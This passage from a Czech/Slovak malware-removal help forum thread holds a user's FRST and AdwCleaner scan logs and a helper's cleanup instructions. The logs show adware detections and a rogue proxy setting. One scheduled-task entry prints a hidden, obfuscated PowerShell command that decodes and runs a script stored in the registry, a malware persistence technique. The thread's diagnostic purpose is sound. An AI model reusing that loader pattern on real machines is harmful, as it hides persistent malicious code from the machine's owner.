2023-11-23 10:31 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2023-11-23 02:21 - 2016-06-04 16:02 - 000065536 _____ C:\Windows\system32\spu_storage.bin
2023-11-22 21:38 - 2016-09-10 17:45 - 000000000 ____D C:\Program Files (x86)\Opera
2023-11-22 16:15 - 2016-08-21 23:14 - 000000000 ____D C:\Users\John\AppData\Roaming\FileZilla
2023-11-22 15:32 - 2022-01-09 22:28 - 000000000 ____D C:\Users\John\AppData\Roaming\Signal
2023-11-22 12:42 - 2022-05-28 18:10 - 000000000 ____D C:\Users\John\AppData\Roaming\ImageGlass
2023-11-22 11:43 - 2018-03-11 14:57 - 000228136 _____ C:\Users\John\AppData\Local\GDIPFONTCACHEV1.DAT
2023-11-22 10:41 - 2018-03-12 09:31 - 005633824 _____ C:\Windows\system32\FNTCACHE.DAT
2023-11-22 03:27 - 2017-06-12 11:19 - 000000000 ____D C:\Users\John\AppData\Roaming\VMware
2023-11-22 03:27 - 2017-06-12 11:19 - 000000000 ____D C:\Users\John\AppData\Local\VMware
2023-11-21 16:56 - 2021-07-20 10:12 - 000003832 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1473525916
2023-11-20 22:31 - 2023-01-23 13:25 - 000000000 ____D C:\Users\John\AppData\Local\KeePassXC
2023-11-20 00:01 - 2019-01-08 15:42 - 000034241 _____ C:\Users\John\AppData\Roaming\VoiceMeeterBananaDefault.xml
2023-11-19 20:02 - 2016-06-05 14:18 - 000000000 ____D C:\ProgramData\Riot Games
2023-11-19 14:33 - 2019-01-31 03:33 - 000000000 ____D C:\Program Files (x86)\SpeedFan
2023-11-17 14:27 - 2021-03-31 18:56 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\PowerPoint
2023-11-17 11:42 - 2021-03-29 12:13 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Excel
2023-11-17 11:37 - 2016-06-04 15:16 - 000000000 ____D C:\Users\John\AppData\Local\Deployment
2023-11-16 19:24 - 2016-06-04 16:36 - 000000000 ____D C:\Users\John\AppData\Roaming\uTorrent
2023-11-16 19:21 - 2019-06-04 22:22 - 000000000 ____D C:\Users\John\AppData\Local\BitTorrentHelper
2023-11-16 19:03 - 2020-01-06 15:07 - 000000000 ____D C:\Users\John\AppData\Roaming\uTorrent 2.2
2023-11-16 19:00 - 2020-03-13 19:30 - 000000000 ____D C:\Users\John\AppData\Local\CrashDumps
2023-11-16 18:59 - 2019-10-01 14:26 - 000000000 ____D C:\Users\John\AppData\Roaming\Wireshark
2023-11-16 18:49 - 2018-05-27 10:31 - 000000000 ____D C:\Temp
2023-11-16 18:49 - 2016-06-04 15:09 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2023-11-15 23:27 - 2023-04-23 11:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Postman
2023-11-15 21:52 - 2020-07-24 18:13 - 000045056 _____ C:\Users\John\.wakatime.db
2023-11-15 21:52 - 2016-06-04 14:57 - 000000000 ____D C:\Users\John
2023-11-15 08:19 - 2023-01-22 15:03 - 000000000 ____D C:\Users\John\AppData\Roaming\Python
2023-11-15 08:13 - 2017-02-20 12:40 - 000000000 ____D C:\Users\John\New folder
2023-11-14 08:45 - 2023-03-21 20:28 - 000003628 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}
2023-11-14 08:45 - 2023-03-21 20:28 - 000003500 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}
2023-11-13 18:14 - 2023-04-23 11:37 - 000002106 _____ C:\Users\John\Desktop\Postman.lnk
2023-11-13 18:14 - 2023-04-23 11:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Postman
2023-11-11 21:28 - 2020-12-14 00:48 - 000138240 ___SH C:\Users\John\Documents\Thumbs.db
2023-11-11 15:50 - 2023-04-02 11:22 - 000000000 ____D C:\Users\John\AppData\Roaming\.minecraft
2023-11-11 15:41 - 2020-03-17 01:47 - 000000000 ____D C:\Users\John\AppData\Roaming\.tlauncher
2023-11-10 09:40 - 2016-07-24 21:43 - 000000000 ____D C:\Windows\Minidump
2023-11-09 14:45 - 2023-05-01 10:15 - 000000000 ____D C:\Users\John\AppData\Local\Postman
2023-11-07 22:21 - 2021-01-20 14:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Authy Desktop
2023-11-03 13:22 - 2017-12-14 02:01 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Word
2023-11-02 12:01 - 2022-12-08 13:49 - 000000112 _____ C:\Users\John\AppData\Roaming\Předvolby CS6 pro JP2K
2023-11-02 00:39 - 2023-09-05 22:43 - 001042153 ____N C:\Windows\Minidump\110223-103491-01.dmp
2023-10-27 18:21 - 2021-04-04 12:00 - 000003434 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2023-10-27 18:21 - 2021-04-04 12:00 - 000003306 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore

==================== Files in the root of some directories ========

2020-05-03 14:07 - 2020-05-03 14:07 - 000000048 ____H () C:\Program Files (x86)\8iq24splw1.dat
2018-12-26 11:13 - 2023-08-12 09:04 - 000000033 _____ () C:\Users\John\AppData\Roaming\AdobeWLCMCache.dat
2020-06-18 22:09 - 2020-06-18 22:09 - 000000068 _____ () C:\Users\John\AppData\Roaming\changzhi_leidian.data
2019-07-14 00:42 - 2020-06-27 12:52 - 000000808 _____ () C:\Users\John\AppData\Roaming\jd-gui.cfg
2018-12-26 11:41 - 2021-07-13 10:52 - 000000028 _____ () C:\Users\John\AppData\Roaming\kulerdata.json
2022-12-08 13:49 - 2023-11-02 12:01 - 000000112 _____ () C:\Users\John\AppData\Roaming\Předvolby CS6 pro JP2K
2022-09-04 13:34 - 2022-09-04 13:34 - 000000142 ___SH () C:\Users\John\AppData\Roaming\UOD.DAT
2019-01-08 15:42 - 2023-11-20 00:01 - 000034241 _____ () C:\Users\John\AppData\Roaming\VoiceMeeterBananaDefault.xml
2019-01-05 02:03 - 2019-01-06 17:26 - 000004634 _____ () C:\Users\John\AppData\Roaming\VoiceMeeterDefault.xml
2022-07-29 00:24 - 2022-07-29 00:24 - 000000142 ___SH () C:\Users\John\AppData\Roaming\YINSLITO.DLL
2022-09-04 17:34 - 2022-09-04 17:34 - 000000142 ___SH () C:\Users\John\AppData\Local\700937146F5B4E19A662A91210046348.rct
2016-11-26 21:00 - 2019-10-04 07:27 - 000001480 _____ () C:\Users\John\AppData\Local\Adobe Uložit pro web 13.0 Prefs
2018-09-06 08:27 - 2018-09-06 08:27 - 000001111 _____ () C:\Users\John\AppData\Local\gamma_ramp.reg
2018-01-28 23:40 - 2023-09-28 14:32 - 000000600 _____ () C:\Users\John\AppData\Local\PUTTY.RND
2021-11-18 10:20 - 2021-11-18 10:20 - 000002939 _____ () C:\Users\John\AppData\Local\recently-used.xbel
2018-07-27 13:26 - 2018-07-27 13:26 - 000000487 _____ () C:\Users\John\AppData\Local\ReclaiMe.config
2017-06-16 14:06 - 2023-10-23 21:37 - 000007665 _____ () C:\Users\John\AppData\Local\Resmon.ResmonCfg
2019-03-04 16:27 - 2019-03-04 16:27 - 000000003 _____ () C:\Users\John\AppData\Local\updater.log
2019-03-04 16:27 - 2019-03-04 16:27 - 000000425 _____ () C:\Users\John\AppData\Local\UserProducts.xml

==================== FLock ==============================

2017-10-27 23:09 C:\Windows\infpub.dat

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2020-09-04 01:24
==================== End of FRST.txt ========================

Re: Prihlasovanie do FB, otvaranie okien v browseri

Napsal: 23 lis 2023 22:01
od Rudy
Zdravím!
Spusťte tuto utilitu:
Ulozte na plochu AdwCleaner https://malwarebytes.com/adwcleaner/ nebo http://www.bleepingcomputer.com/download/adwcleaner/

ukoncete vsechny programy
odsouhlaste licencni podmiky (EULA) klikem na Souhlasim
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Skenovat nyni (Scan now), pote na Cisteni a opravy (Clean and Repair)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt), jehoz obsah zkopirujte do pristi odpovedi

Re: Prihlasovanie do FB, otvaranie okien v browseri

Napsal: 25 lis 2023 10:43
od mivefe5888
# -------------------------------
# Malwarebytes AdwCleaner 8.4.0.0
# -------------------------------
# Build: 08-30-2022
# Database: 2023-07-19.3 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 11-24-2023
# Duration: 00:01:04
# OS: Windows 7 Service Pack 1
# Scanned: 32102
# Detected: 15


***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

Trojan.LVBP.ED C:\Program Files (x86)\Object

***** [ Files ] *****

No malicious files found.

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

No malicious tasks found.

***** [ Registry ] *****

No malicious registry entries found.

***** [ Chromium (and derivatives) ] *****

PUP.Optional.QuickStart pelmeidfhdlhlbjimpabfcbnnojbboma

***** [ Chromium URLs ] *****

PUP.Optional.Conduit http://search.conduit.com/?ctid=CT33218 ... 7BBE&SSPV=
PUP.Optional.Legacy Search Here
PUP.Optional.Legacy Trovi search
PUP.Optional.Legacy http://www.istartsurf.com/?type=hp&ts=1 ... XXZ1D81TPZ
PUP.Optional.Legacy http://www.istartsurf.com/?type=hp&ts=1 ... XXZ1D81TPZ
PUP.Optional.Legacy http://www.istartsurf.com/?type=hp&ts=1 ... XXZ4Y3Y2NT
PUP.Optional.Legacy http://www.trovi.com/?gd=&ctid=CT332189 ... F073&SSPV=
PUP.Optional.Legacy istartsurf
PUP.Optional.Legacy istartsurf
PUP.Optional.Legacy istartsurf
PUP.Optional.MySearch Search Here
PUP.Optional.Trovi Trovi search
PUP.Optional.Trovi http://www.trovi.com/?gd=&ctid=CT332189 ... F073&SSPV=

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries found.

***** [ Firefox URLs ] *****

No malicious Firefox URLs found.

***** [ Hosts File Entries ] *****

No malicious hosts file entries found.

***** [ Preinstalled Software ] *****

No Preinstalled Software found.


AdwCleaner[S00].txt - [3231 octets] - [12/07/2019 19:54:44]
AdwCleaner[C00].txt - [3181 octets] - [12/07/2019 19:55:17]
AdwCleaner[S01].txt - [4123 octets] - [06/06/2021 17:24:21]
AdwCleaner[C01].txt - [3945 octets] - [06/06/2021 17:27:48]
AdwCleaner[S02].txt - [3009 octets] - [29/07/2021 16:20:39]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S03].txt ##########

Re: Prihlasovanie do FB, otvaranie okien v browseri

Napsal: 25 lis 2023 11:05
od Rudy
Nalezené položky smažte (dejte do karantény), restartujte a dejte nové logy FRST+Addition.

Re: Prihlasovanie do FB, otvaranie okien v browseri

Napsal: 25 lis 2023 12:21
od mivefe5888
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 05-11-2023 02
Ran by John (administrator) on JOHN-PC (25-11-2023 11:43:28)
Running from C:\Users\John\Downloads\FRST64.exe
Loaded Profiles: John
Platform: Microsoft Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Default browser: Opera
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
(C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe
(C:\Program Files (x86)\Opera\opera.exe ->) (Opera Norway AS -> Opera Software) C:\Program Files (x86)\Opera\95.0.4635.90\opera_crashreporter.exe
(C:\Program Files\Adobe\Adobe Photoshop CC 2015\Photoshop.exe ->) (Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files\Adobe\Adobe Photoshop CC 2015\Required\CEP\CEPHtmlEngine\CEPHtmlEngine.exe <3>
(C:\Program Files\Adobe\Adobe Photoshop CC 2015\Photoshop.exe ->) (Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files\Adobe\Adobe Photoshop CC 2015\Required\DynamicLinkMediaServer\32\dynamiclinkmanager.exe
(C:\Program Files\Adobe\Adobe Photoshop CC 2015\Photoshop.exe ->) (Joyent, Inc -> Joyent, Inc) C:\Program Files\Adobe\Adobe Photoshop CC 2015\node.exe
(C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe ->) (Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\dispatcher.exe
(C:\Riot Games\Riot Client\RiotClientServices.exe ->) () [File not signed] C:\Riot Games\Riot Client\RiotClientCrashHandler.exe
(Discord Inc. -> Discord Inc.) C:\Users\John\AppData\Local\Discord\app-1.0.9024\Discord.exe <6>
(explorer.exe ->) () [File not signed] I:\stahovanie\gammy_v0.9.64\gammy.exe
(explorer.exe ->) (Adobe Systems Incorporated -> Adobe Systems, Incorporated) C:\Program Files\Adobe\Adobe Photoshop CC 2015\Photoshop.exe
(explorer.exe ->) (Figma, Inc. -> ) C:\Users\John\AppData\Local\FigmaAgent\figma_agent.exe
(explorer.exe ->) (Johannes Millan) [File not signed] [File is in use] I:\stahovanie\superProductivity-7.12.0.exe
(explorer.exe ->) (Malwarebytes Inc. -> Malwarebytes) I:\stahovanie\scoped_dir3748_485742690\AdwCleaner.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Riot Games\Riot Client\RiotClientServices.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.332\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.332\GoogleCrashHandler64.exe
(I:\stahovanie\superProductivity-7.12.0.exe ->) (Johannes Millan) [File not signed] C:\Users\John\AppData\Local\Temp\2EDNJDl4YnJmwr5naxHqvVY7EUJ\superProductivity.exe <4>
(Opera Norway AS -> Opera Software) C:\Program Files (x86)\Opera\opera.exe <57>
(services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(services.exe ->) (Flexera Software LLC -> Flexera Software LLC) C:\Program Files (x86)\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService.exe
(services.exe ->) (Flexera Software LLC -> Flexera Software LLC) C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
(services.exe ->) (LogMeIn, Inc. -> LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe
(services.exe ->) (Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
(services.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\alg.exe
(services.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgc.exe
(services.exe ->) (SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(services.exe ->) (SolidWorks) [File not signed] C:\Program Files (x86)\Common Files\SOLIDWORKS Shared\Service\SolidWorksLicensing.exe
(services.exe ->) (South River Technologies -> South River Technologies, Inc.) C:\Program Files\WebDrive\wdService.exe
(services.exe ->) (Synology Inc. -> ) C:\Program Files (x86)\Synology\SynologyDrive\bin\vss-service-x64.exe
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(services.exe ->) (Tonalio GmbH -> Sandboxie-Plus.com) D:\windows programy\Sandboxie-Plus\SbieSvc.exe
(services.exe ->) (Trace Software International -> ) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Electrical\server\EwServer.exe
(services.exe ->) (VMware, Inc. -> ) C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Program Files (x86)\Common Files\VMware\USB\vmware-usbarbitrator64.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3089288 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\...\Run: [Figma Agent] => C:\Users\John\AppData\Local\FigmaAgent\figma_agent.exe [6795040 2023-10-31] (Figma, Inc. -> )
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\...\Run: [RiotClient] => C:\Riot Games\Riot Client\RiotClientServices.exe [70912472 2023-11-16] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM\...\Windows x64\Print Processors\Canon MG3000 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDDG.DLL [30720 2016-05-15] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Windows x64\Print Processors\Canon TS3300 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDG3.DLL [482816 2019-03-26] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Adobe PDF Port Monitor: C:\Windows\system32\AdobePDF.dll [55432 2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MG3000 series: C:\Windows\system32\CNMLMDG.DLL [485376 2016-05-15] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor TS3300 series: C:\Windows\system32\CNMLMG3.DLL [1311232 2019-03-26] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\EPSON WF-2870 Series 64MonitorBE: C:\Windows\system32\E_YLMBXVE.DLL [187392 2018-06-15] (Microsoft Windows Hardware Compatibility Publisher -> Seiko Epson Corporation)
HKLM\...\Print\Monitors\HP 1853 Status Monitor: C:\Windows\system32\hpinksts1853LM.dll [467464 2019-11-28] (HP Inc -> HP Inc.)
HKLM\...\Print\Monitors\HP Discovery Port Monitor (HP DeskJet 2700 series): C:\Windows\system32\HPDiscoPM1853.dll [996512 2022-01-25] (HP Inc. -> HP Inc.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\Installer\chrmstp.exe [2023-03-21] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [>{BC455173-F501-4356-804F-571FAFB6EA9A}] -> RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{30C521FB-255B-46C8-9F0D-EE5AE371C9AA}] -> C:\Program Files (x86)\AVAST Software\Browser\Application\86.1.6960.198\Installer\chrmstp.exe [2020-11-24] (Avast Software s.r.o. -> AVAST Software)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {41D08211-8A07-4B1A-948A-B4B8BF58632A} - System32\Tasks\Robotka
Task: {AAAA1BA0-9973-47D1-B128-DD3F1CC9DEF6} - System32\Tasks\Motivacia
Task: {483F605F-4ACC-438C-A6BA-C7E06893DE4E} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1552376 2022-09-26] (Adobe Inc. -> Adobe Inc.)
Task: {E064BC14-AB10-4997-B691-1589F21C0F1F} - System32\Tasks\AdobeAAMUpdater-1.0-John-PC-John => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
Task: {A44084B5-2748-4011-95F6-DAF5403D9398} - System32\Tasks\AdobeGCInvoker-1.0-John-PC-John => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [316392 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
Task: {64C634CD-B1AF-4B19-894B-BA25119772A0} - System32\Tasks\AdwCleaner_onReboot => I:\stahovanie\scoped_dir3748_485742690\AdwCleaner.exe [8791352 2023-11-24] (Malwarebytes Inc. -> Malwarebytes)
Task: {C826FD7A-B8B6-40D8-A041-2076C47165CA} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [4621920 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
Task: {B6215906-8048-45F1-AC2E-0D0F74C0649A} - System32\Tasks\Avast Secure Browser Heartbeat Task (Hourly) => C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe [1933408 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
Task: {C2B756A2-8142-4B50-B9C0-C715DB45B991} - System32\Tasks\Avast Secure Browser Heartbeat Task (Logon) => C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe [1933408 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
Task: {0A9D12E3-3DCF-40E3-80B9-803013CD2C22} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe /backup /iavs (No File)
Task: {9D6C3930-F621-4296-A748-5865083AD527} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1741416 2020-09-22] (Avast Software s.r.o. -> Avast Software)
Task: {4D82607E-7526-4BF6-9F28-C3328EC91A74} - System32\Tasks\AvastUpdateTaskMachineCore => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
Task: {6B681D84-73C0-42F0-816A-FAC346025961} - System32\Tasks\AvastUpdateTaskMachineUA => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
Task: {E82B4641-76E0-465D-875B-7C8D9733E5FD} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [13797712 2018-09-06] (Piriform Ltd -> Piriform Ltd)
Task: {8B006428-2138-449F-8FEF-00FD52F474FC} - System32\Tasks\EPSON WF-2870 Series Update {E68B163E-C7D5-4EDD-9994-7FE352488197} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {89F2385D-C566-491E-8211-929329243711} - System32\Tasks\EPSON WF-2870 Series Update {F36A92EA-C9F5-4280-9BE4-615524B64A59} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {AC5DCEC8-7ADC-420A-928F-2E4D77508D8B} - System32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {795E77E3-0EEC-4504-9D64-C02F56BB6298} - System32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {6CA9BD1E-E93C-4F62-A79E-4BC1371F6109} - System32\Tasks\HPCustParticipation HP DeskJet 2700 series => C:\Program Files\HP\HP DeskJet 2700 series\Bin\HPCustPartic.exe [6732960 2022-01-25] (HP Inc. -> HP Inc.)
Task: {454DE0F3-8EFA-4669-8D0B-C409CA75EFF0} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [5967976 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {9254C62C-104D-473C-BB40-833CC10AD75B} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [5967976 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {571EEDE0-9D34-4AC1-9B1F-AD573C6CAC52} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [315056 2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
Task: {5D6BF89C-14FD-4209-BEDE-8D6B54312C30} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [315056 2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
Task: {E1303010-25DC-4FEC-9EBE-33A7E35BB7B3} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\Program Files (x86)\Microsoft Visual Studio\Installer.021f431b30104264a8dbbd90054a1361\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe (No File)
Task: {75A225D9-05D2-41D3-89C6-7C86CBC51CBE} - System32\Tasks\Microsoft\Windows\Management\Provisioning\KE4x9F5p\4F379EE4-AF11-4D1B-8863-5E5A969FD790 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [473600 2009-07-14] (Microsoft Windows -> Microsoft Corporation) -> -WINdowstyLE hiDDEN -comMAnD "icm ([sCripTBlOCk]::creatE([sTRInG]::JoIN('', ((get-ITEmpRoPerty -PATh 'Hklm:\soFtware\GhiSlerkE4X9').'ke4X9F5' | % { [CHar]($_ -bXOr 128) }))))"
Task: {E296B281-E679-4FF5-9072-68B6B9295C53} - System32\Tasks\Microsoft\Windows\RestartManager\{369FD764-7CF1-4ad7-B1C9-2445F4CAF599} => C:\Windows\system32\rmclient.exe [16896 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Task: {999F29AA-219C-4D8B-8489-FC171F033440} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [765888 2023-04-18] (Mozilla Corporation -> Mozilla Foundation)
Task: {47F65D7C-3405-49BE-9CB4-34FDE0AF233D} - System32\Tasks\Opera scheduled Autoupdate 1473525916 => C:\Program Files (x86)\Opera\launcher.exe [1977760 2023-10-30] (Opera Norway AS -> Opera Software)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\EPSON WF-2870 Series Update {E68B163E-C7D5-4EDD-9994-7FE352488197}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE:/EXE:{E68B163E-C7D5-4EDD-9994-7FE352488197} /F:UpdateSYSTEMĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\Windows\Tasks\EPSON WF-2870 Series Update {F36A92EA-C9F5-4280-9BE4-615524B64A59}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE:/EXE:{F36A92EA-C9F5-4280-9BE4-615524B64A59} /F:UpdateSYSTEMĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-949114339-2066100574-2594248327-1000] => 178.32.129.31:3128
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{54287F57-F62E-4A77-887F-98CFD53339ED}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{B1477436-BDB7-43DB-8368-4FEBFCEBABA8}: [DhcpNameServer] 192.168.0.1

Edge:
=======
Edge Profile: C:\Users\John\AppData\Local\Microsoft\Edge\User Data\Default [2023-09-05]
Edge Extension: (Edge relevant text changes) - C:\Users\John\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2023-09-05]

FireFox:
========
